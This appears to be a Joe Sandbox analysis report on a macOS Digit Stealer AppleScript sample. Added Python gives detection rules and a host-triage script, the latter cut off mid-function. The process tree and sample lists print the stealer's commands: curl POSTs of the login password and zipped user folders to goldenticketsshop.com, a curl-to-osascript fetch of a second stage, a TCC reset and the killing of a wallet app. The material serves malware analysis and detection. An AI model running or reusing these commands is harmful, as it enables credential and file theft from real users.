

macOS Analysis Report
payload_1_stealer.scpt

Overview

General Information

Sample name: payload_1_stealer.scpt
Analysis ID: 5177034
Has dependencies: false
MD5: 891b1bf224a59baa80e0ed0c08a08131
SHA1: b463cfbeb11a86b0650a42667794ae888791913d
SHA256: 5d8a374139573798e23de60d1ca1610f6d1abecd5d17ecf32c82f1cfd338e03f

Detection

Digit Stealer
Score: 88
Range: 0 - 100

Signatures

Exfiltrates password data via HTTP using curl
Kills crypto wallet applications, indicative of crypto stealers
Yara detected Digit Stealer
Clears all privacy permission grants using tccutil
Executes the "dscl" command with authonly argument (probably to verify the login password)
Mutes the volume using AppleScript likely to hide suspicious activity from the user
Terminates several processes with shell command 'killall'
Uploads files by emulating a filled-in form
Writes files containing the user's password
Creates hidden files, links and/or directories
Executes AppleScripts and/or other OSA language scripts with shell command "osascript"
Executes commands using a shell command-line interpreter
Executes cryptographic hash commands used for computing and checking message digests
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "mkdir" command used to create folders
Executes the "nohup" (no hangup) command, used to keep a background process running after its controlling terminal closes
Executes the "rm" command used to delete files or directories
Executes the "system_profiler" command used to collect detailed system hardware and software information
Executes the "tccutil" command used to manage privacy permissions controlled by TCC (Transparency, Consent, and Control)
Executes the "uuidgen" command used to generate UUIDs
Many shell processes execute programs via execve syscall (might be indicative of malicious behavior)
Uses AppleScript framework/components containing AppleScript related functionalities
Uses AppleScript scripting additions containing additional functionalities for AppleScripts
Writes ZIP files to disk

Classification

Joe Sandbox version:
Analysis ID: 5177034
Start date and time: 2026-01-14 15:17:02 +01:00
Joe Sandbox product: Cloud
Overall analysis duration: 0h 11m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultmacinteractivecookbook.jbs
Analysis system description: Mac Mini, Apple Silicon ARM64, Sequoia (Office 2021, Java 8 Update 471, Adobe Acrobat Reader 25, Chrome 142, Firefox 145, Node.js 24.11.1, NPM 11.6.2)
macOS major version: 15
CPU architecture: arm64
Analysis Mode: default
Sample name: payload_1_stealer.scpt
Detection: MAL
Classification: mal88.troj.spyw.evad.macSCPT@0/28@5/0
  • Excluded IPs from analysis (whitelisted): 17.253.3.137, 17.253.3.141, 17.253.15.132, 17.253.57.202, 17.253.15.136, 17.253.57.200, 173.222.168.250, 17.253.15.150, 17.253.37.210, 17.253.53.205, 17.253.37.201, 17.253.53.208, 17.253.15.162, 17.253.29.204, 17.253.29.210, 64.78.200.1, 17.132.88.112, 17.132.88.120, 17.253.96.119, 64.78.201.1, 17.132.88.117, 17.253.144.10, 17.253.57.195, 17.253.57.199, 23.44.201.178, 23.44.201.187, 17.171.47.23, 17.253.3.140, 17.253.3.134, 23.59.144.237, 23.59.144.201, 17.253.57.198, 17.253.57.196, 17.253.15.140, 23.50.131.77
  • Excluded domains from analysis (whitelisted): www-apple-com.v.aaplimg.com, pancake.apple.com, pancake.g.aaplimg.com, gdmf.apple.com, app-site-association.cdn-apple.com, app-site-association.cdn-apple.com.akadns.net, e5977.dsce9.akamaiedge.net, configuration-lb.ls-apple.com.akadns.net, www.apple.com, configuration-row-lb.apple.com.akadns.net, configuration.ls.apple.com, gdmf.v.aaplimg.com, doh.dns.apple.com, e3925.dscg.akamaiedge.net, a1091.dscapi7.akamai.net, app-site-association.g.aaplimg.com, stocks-data-service.lb-apple.com.akadns.net, experiments.apple.com, ab.apple.com.akadns.net, e6858.dsce9.akamaiedge.net, configuration.ls.v.aaplimg.com, experiments.apple.com.edgekey.net, doh-dns-apple-com.v.aaplimg.com, stocks-data-service-row.lb-apple.com.akadns.net, mesu-cdn.origin-apple.com.akadns.net, apple.com, apps-mzstatic-lb.itunes-apple.com.akadns.net, mesu.g.aaplimg.com, www.apple.com.edgekey.net, weatherkit.apple.com, apps-mzstatic-cdn.itunes-apple.com.akadns.net, configuration.v.aaplimg.com, stocks-data-se
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many JMT_LOOKUP calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Runtime messages are not available for Live Interaction sessions
  • System is mac-arm-sequoia
  • launchd New Fork (PID: 1659, Parent: 1)
  • xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy com.apple.AuthenticationServicesCore.AuthenticationServicesAgent
  • AuthenticationServicesAgent (MD5: 51b6e9f57b972003f862cbee0a018d22) Arguments: /System/Cryptexes/App/usr/libexec/AuthenticationServicesAgent
  • Terminal New Fork (PID: 1661, Parent: 437)
  • login (MD5: 03b1ed8c15ae09b42c847a7d3a903793) Arguments: login -pf jess
    • login New Fork (PID: 1662, Parent: 1661)
    • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: -bash
      • bash New Fork (PID: 1663, Parent: 1662)
        • bash New Fork (PID: 1664, Parent: 1663)
        • path_helper (MD5: 19a4db31fd1c2f359e98b84bf8b4738c) Arguments: /usr/libexec/path_helper -s
      • bash New Fork (PID: 1665, Parent: 1662)
      • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -m 700 -p /Users/jess/.bash_sessions
      • bash New Fork (PID: 1666, Parent: 1662)
        • bash New Fork (PID: 1667, Parent: 1666)
        • touch (MD5: c293312b66ea9feb646a6ab17eb8fea6) Arguments: /usr/bin/touch /Users/jess/.bash_sessions/75A3C1DC-74DD-49F5-A23E-2D938806E22F.historynew
      • bash New Fork (PID: 1676, Parent: 1662)
      • osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript payload_1_stealer.scpt
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5
          • bash New Fork (PID: 1678, Parent: 1677)
          • system_profiler (MD5: 917b2aeeaa665167730054c51b2e401a) Arguments: system_profiler SPHardwareDataType
            • system_profiler (MD5: 917b2aeeaa665167730054c51b2e401a) Arguments: /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
          • bash New Fork (PID: 1679, Parent: 1677)
          • awk (MD5: 23e179705448b4852c2872f3fb21e64e) Arguments: awk -F: /Hardware UUID/ {print $2}
          • bash New Fork (PID: 1680, Parent: 1677)
          • md5 (MD5: 2d57517294ccc647bc9725bb97e5550e) Arguments: md5
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c uuidgen
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c uuidgen
        • uuidgen (MD5: 802746000e26887a8877aea77e22a9c7) Arguments: uuidgen
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5
          • bash New Fork (PID: 1685, Parent: 1684)
          • bash New Fork (PID: 1686, Parent: 1684)
          • tr (MD5: cf3665845ff99ebd92786f71887ecbfe) Arguments: tr -d \n
          • bash New Fork (PID: 1687, Parent: 1684)
          • md5 (MD5: 2d57517294ccc647bc9725bb97e5550e) Arguments: md5
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c tail -n 1 /tmp/wid.txt
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c tail -n 1 /tmp/wid.txt
        • tail (MD5: 63ce395284bfbe6de4a23d8e04437d0c) Arguments: tail -n 1 /tmp/wid.txt
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'
        • dscl (MD5: e65212ab7a555d70d0b19a2badc318b0) Arguments: /usr/bin/dscl /Local/Default -authonly jess 123456
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &
          • bash New Fork (PID: 1701, Parent: 1700)
          • nohup (MD5: 1775c434908723c7b7eedd9b05a0118a) Arguments: nohup curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials
          • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo $HOME
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo $HOME
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c tccutil reset All
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c tccutil reset All
        • tccutil (MD5: bfc1833a20a58a5f31aa4731c1d8216f) Arguments: tccutil reset All
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75
          • bash New Fork (PID: 1744, Parent: 1743)
          • zip (MD5: 2e76e4c228d7c01108eeee4f5277037c) Arguments: zip -r /tmp/a5b9845c461d901dad1363386bac5a75.zip a5b9845c461d901dad1363386bac5a75
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber
        • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabber
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
        • rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'
        • rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -f /tmp/a5b9845c461d901dad1363386bac5a75.zip
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &
          • bash New Fork (PID: 1817, Parent: 1816)
          • nohup (MD5: 1775c434908723c7b7eedd9b05a0118a) Arguments: nohup curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
          • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
          • bash New Fork (PID: 1818, Parent: 1816)
          • osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c osascript -e 'set volume with output muted'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c osascript -e 'set volume with output muted'
            • osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript -e set volume with output muted
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p '/tmp/downloaded_parts'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p '/tmp/downloaded_parts'
            • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/downloaded_parts
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -f '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -f '/tmp/app.asar.zip'
            • rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -f /tmp/app.asar.zip
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'
            • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part1.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'
              • bash New Fork (PID: 1826, Parent: 1825)
              • cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part1.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'
            • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part2.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'
              • bash New Fork (PID: 1832, Parent: 1831)
              • cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part2.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'
            • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part3.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'
              • bash New Fork (PID: 1836, Parent: 1835)
              • cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part3.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'
              • bash New Fork (PID: 1838, Parent: 1837)
              • unzip (MD5: 7d81bfe1a6d84df1bbbcc3af8e7be0dc) Arguments: unzip -o /tmp/app.asar.zip
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c killall 'Ledger Live' || true
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c killall 'Ledger Live' || true
              • bash New Fork (PID: 1840, Parent: 1839)
              • killall (MD5: ab923814083d0c666a3716402eac3530) Arguments: killall Ledger Live
  • launchd New Fork (PID: 1724, Parent: 1)
  • xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy application.com.apple.Notes.1152921500311893562.1152921500311893567
  • Notes (MD5: 7105c07ed36ce8aa97a926c6016d8529) Arguments: /System/Applications/Notes.app/Contents/MacOS/Notes
  • launchd New Fork (PID: 1753, Parent: 1)
  • xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy application.com.apple.systempreferences.1152921500311901955.1152921500311901960
  • System Settings (MD5: b0e7acffcbec74a202bf0ceaaec4d470) Arguments: /System/Applications/System Settings.app/Contents/MacOS/System Settings
  • cleanup
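The process tree above is the whole first stage read top to bottom: osascript runs the .scpt, which shells out to fingerprint the host (Hardware UUID piped through md5 becomes the hwid), generates a per-run UUID, verifies the captured password against the local directory node with dscl -authonly, POSTs hwid/user/pass to goldenticketsshop.com/api/credentials, appends the password to a hidden ~/.<hwid>.txt, resets every TCC grant, builds a /tmp/<id>/{Desktop,Documents,Downloads,Notes} staging tree, zips and uploads it to /api/grabber, deletes the staging data, and finally pipes a second AppleScript from a pages.dev host straight into osascript. That stage mutes audio, downloads app.asar.zip in three numbered parts, unzips it in /tmp and kills Ledger Live; the report notes it was truncated, so what follows the kill is not recorded here. The detection rules below are an added example written from those command lines, not part of the Joe Sandbox report or of the sample. They are meant for process-creation telemetry where the argv of each `sh -c` child is visible; the wallet list holds only the application this report shows being killed.

```python
"""Command-line rules for the behaviour recorded in the process tree above.

Added example, not part of the report or the sample: each rule is written
from one of the `sh -c ...` children osascript spawns in the tree, and
SAMPLE_CMDLINES are copied from it. Run over EDR / Endpoint Security /
unified-log process events that expose the argv of shell children.
"""
import re

# Only the wallet seen in this report; extend locally.
WALLET_APPS = ("Ledger Live",)

RULES = [
    # Fingerprint: Hardware UUID piped through md5 becomes the 'hwid' field.
    ("hwid_fingerprint",
     re.compile(r"system_profiler\s+SPHardwareDataType.*Hardware UUID.*\bmd5\b")),
    # Password check against the local directory node, cleartext in argv.
    ("dscl_authonly", re.compile(r"\bdscl\b.*\s-authonly\s")),
    # curl POST body carrying a password field.
    ("curl_credential_post", re.compile(r"\bcurl\b.*\s-d\s+.*\bpass(word)?=")),
    # Wipes every TCC consent so later prompts re-ask the (now known) user.
    ("tccutil_reset_all", re.compile(r"\btccutil\s+reset\s+All\b")),
    # Archive of a /tmp staging directory, the step before the upload.
    ("tmp_zip_staging", re.compile(r"\bzip\s+-r\s+['\"]?/tmp/")),
    # Multipart upload of a local file ("emulating a filled-in form").
    ("curl_file_upload", re.compile(r"\bcurl\b.*\s-F\s+['\"]?file=@")),
    # Remote script piped straight into the OSA interpreter.
    ("curl_pipe_osascript", re.compile(r"\bcurl\b.*\|\s*osascript\b")),
    # Audio muted so the user does not hear what follows.
    ("mute_volume", re.compile(r"set volume with output muted")),
    # Wallet application terminated.
    ("killall_wallet",
     re.compile(r"\bkillall\b.*(" + "|".join(map(re.escape, WALLET_APPS)) + r")")),
]


def classify(cmdline: str) -> set:
    """Tags of every rule that matches one process command line."""
    return {tag for tag, rx in RULES if rx.search(cmdline)}


def triage_cmdlines(cmdlines) -> dict:
    """{cmdline: tags} for the lines that match at least one rule."""
    out = {}
    for c in cmdlines:
        tags = classify(c)
        if tags:
            out[c] = tags
    return out


def distinct_techniques(cmdlines) -> int:
    """Number of distinct rules fired across one session. Any single rule
    (curl -F, killall, even tccutil) has benign explanations; several of
    them under one osascript process tree is the signal."""
    seen = set()
    for c in cmdlines:
        seen |= classify(c)
    return len(seen)


# Copied from the process tree. The password value is the analysis
# machine's own login password, not a real credential.
SAMPLE_CMDLINES = [
    "sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5",
    "sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'",
    "sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d "
    "'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' "
    "https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &",
    "sh -c tccutil reset All",
    "sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75",
    "sh -c curl --retry 10 --retry-delay 10 --max-time 3600 "
    "-F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' "
    "-F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber",
    "sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/"
    "32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &",
    "sh -c osascript -e 'set volume with output muted'",
    "sh -c killall 'Ledger Live' || true",
    # Benign line from the same tree (bash session start-up); must not match.
    "mkdir -m 700 -p /Users/jess/.bash_sessions",
]

if __name__ == "__main__":
    for line, tags in triage_cmdlines(SAMPLE_CMDLINES).items():
        print(sorted(tags), line[:72])
    print("distinct techniques:", distinct_techniques(SAMPLE_CMDLINES))
```

Score on the session, not the line: the dscl -authonly check and the tccutil reset All are the two rules with the fewest benign explanations when the parent is osascript, and every one of the nine rules fires on this single process tree.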
Yara match: Source: payload_1_stealer.scpt; Rule: JoeSecurity_DigitStealer; Description: Yara detected Digit Stealer; Author: Joe Security
    No Suricata rule has matched
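The two identifiers in the tree are derived deterministically, which matters for response. The hwid is md5 of the Hardware UUID as printed by awk, i.e. with a trailing newline, and the staging-directory name is md5 of the uuidgen output with the newline stripped by tr. The hwid is the 'hwid' form field in both POSTs and names the hidden file ~/.<hwid>.txt that receives the password, so a responder who knows a host's Hardware UUID can compute the hwid that host would have reported and match it against C2 form data or proxy logs, and can look for the dropped file by name. The script below is an added example, not the report's or the sample's code; its HOME and tmp contents are constructed inline, and the Hardware UUID it uses is made up (the uuidgen value is the one logged in the tree). If the derivation is right, derive_session_id of that UUID reproduces the a5b9845c… directory name; the example leaves that as a check for the reader rather than asserting it.

```python
"""Victim identifiers and on-disk artifacts of this sample.

Added example, not from the report or the malware. Derivations follow the
two pipelines in the process tree:

  system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5
      hwid       = md5(<Hardware UUID> + "\n")   awk's print appends a newline
  echo '<uuidgen output>' | tr -d '\n' | md5
      session id = md5(<UUID>)                    newline removed by tr
"""
import hashlib
import os
import re
import tempfile

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def derive_hwid(hardware_uuid: str) -> str:
    """hwid exactly as the sample derives it: UUID plus awk's trailing newline."""
    return md5_hex(hardware_uuid + "\n")


def derive_session_id(uuid: str) -> str:
    """Staging directory / zip name: md5 of the uuidgen output, no newline."""
    return md5_hex(uuid)


def triage_host(home: str, tmp: str, hardware_uuid: str) -> dict:
    """Check one host for the files this sample writes.

    The staging tree and zip are removed with rm -rf after the upload, so
    they only survive an interrupted run; the hidden credential file is
    appended to (>>) and is not cleaned up in the recorded run.
    """
    hwid = derive_hwid(hardware_uuid)
    f = {"hwid": hwid, "credential_file": None, "wid_file": False,
         "staging_dirs": [], "staging_zips": [], "stage2_parts": False}
    cred = os.path.join(home, f".{hwid}.txt")
    if os.path.isfile(cred):
        f["credential_file"] = cred
    f["wid_file"] = os.path.isfile(os.path.join(tmp, "wid.txt"))
    f["stage2_parts"] = (os.path.isdir(os.path.join(tmp, "downloaded_parts"))
                         or os.path.isfile(os.path.join(tmp, "app.asar.zip")))
    for name in os.listdir(tmp):
        stem = name[:-4] if name.endswith(".zip") else name
        if HEX32.match(stem):
            key = "staging_zips" if name.endswith(".zip") else "staging_dirs"
            f[key].append(os.path.join(tmp, name))
    return f


def run_demo() -> dict:
    """Build a constructed HOME and tmp with this sample's artifacts, then triage them."""
    hw_uuid = "00000000-1111-2222-3333-444444444444"   # constructed, not the sandbox's UUID
    session = derive_session_id("F6755809-1549-4438-86BA-7B8DDC85498B")  # uuidgen value from the tree
    root = tempfile.mkdtemp()
    home, tmp = os.path.join(root, "home"), os.path.join(root, "tmp")
    os.makedirs(home)
    os.makedirs(os.path.join(tmp, session, "Desktop"))   # interrupted run: staging left behind
    with open(os.path.join(home, f".{derive_hwid(hw_uuid)}.txt"), "a") as fh:
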